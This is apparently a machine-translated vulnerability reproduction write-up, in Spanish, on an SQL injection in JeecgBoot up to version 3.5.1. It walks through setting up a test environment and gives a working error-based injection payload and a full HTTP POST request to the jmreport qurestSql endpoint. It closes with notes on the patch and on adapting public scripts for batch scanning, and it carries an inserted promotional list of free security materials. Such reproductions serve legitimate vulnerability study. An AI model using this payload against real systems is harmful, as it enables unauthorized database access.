Introducción
El generador de código de JeecgBoot es una herramienta que puede ayudar a los desarrolladores a crear rápidamente aplicaciones de nivel empresarial. Puede generar códigos front-end y back-end con un solo clic sin escribir ningún código, lo que permite a los desarrolladores centrarse más en la lógica empresarial.
Versión afectada
Jeecg-arranque<=3.5.1
Construcción del entorno
idea+
Código fuente del servidor:
https://github.com/jeecgboot/jeecg-boot/archive/refs/tags/v3.5.0.zip
Código fuente de front-end:
https://github.com/jeecgboot/jeecgboot-vue3/archive/refs/tags/v3.5.0.zip
instalar npm, instalar nodejs
https://nodejs.org/dist/v18.16.1/node-v18.16.1-x64.msi
instalar hilo
npm install -g yarn
descargar dependencias
yarn install
yarn run serve //起服务
Debido a la separación de los extremos delantero y trasero, se requiere la tabla de importación de la base de datos, que se puede importar directamente usando navicat
Construya el servidor back-end, use idea para construir e importar proyectos y modificar la configuración de la base de datos
Configurar el servicio npm del lado del servidor
Comience directamente después de la configuración, visite
http://localhost:3100/iniciar sesión
Construido con éxito
Para ayudarlo a estudiar ciberseguridad, puede recibir un conjunto completo de información de forma gratuita:
① Mapa mental de la ruta de aprendizaje y crecimiento de la ciberseguridad
② Más de 60 kits de herramientas clásicas de ciberseguridad
③ Más de 100 informes de análisis SRC
④ Más de 150 libros electrónicos sobre técnicas de ataque y defensa de ciberseguridad
⑤ La guía de examen de certificación CISSP más autorizada + Banco de preguntas
⑥ Más de 1800 páginas del Manual de habilidades prácticas de CTF
⑦ Colección de las últimas preguntas de entrevistas de empresas de seguridad de redes (incluidas las respuestas)
⑧ Guía de pruebas de seguridad de clientes de aplicaciones (Android+IOS)
Recurrencia de vulnerabilidad
El front-end y el back-end están separados, el puerto del back-end es 8080, Carga útil:
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Content-Type: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Length: 128
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
analizar
El punto de generación de vulnerabilidades se encuentra en el complemento de informe de bloques de construcción, verifique la actualización de la versión 3.5.1 actualizada
El archivo en 72 ha sido cambiado, y db/其他数据库/jeecgboot-sqlserver2019.sqlel método de inserción de datos necesita ser reescrito en la atención
jeecg-boot-base-core/src/main/java/org/jeecg/common/util/SqlInjectionUtil.javaRegularidad agregada a las declaraciones sql en
Esta solución es para la inyección SQL de backend,/sys/duplicate/check
La última versión actualizada 3.5.1 todavía no parece tener algunas medidas de refuerzo para los informes de bloques de construcción. Reemplace el paquete jar al reparar
En la actualidad, se ha actualizado el paquete oficial de bloques de construcción.
Preste atención al registro de actualización de bloques de construcción en mayo
http://jimureport.com/doc/log
resumen
Hay scripts maestros en github, pero si desea usarlos en lotes, se recomienda modificar el contenido de la respuesta.Si solo se informan errores por fallas de operación, se informará una gran cantidad de errores.
Se recomienda modificar el eco de todos los juicios personalizados y señalar cualquier error.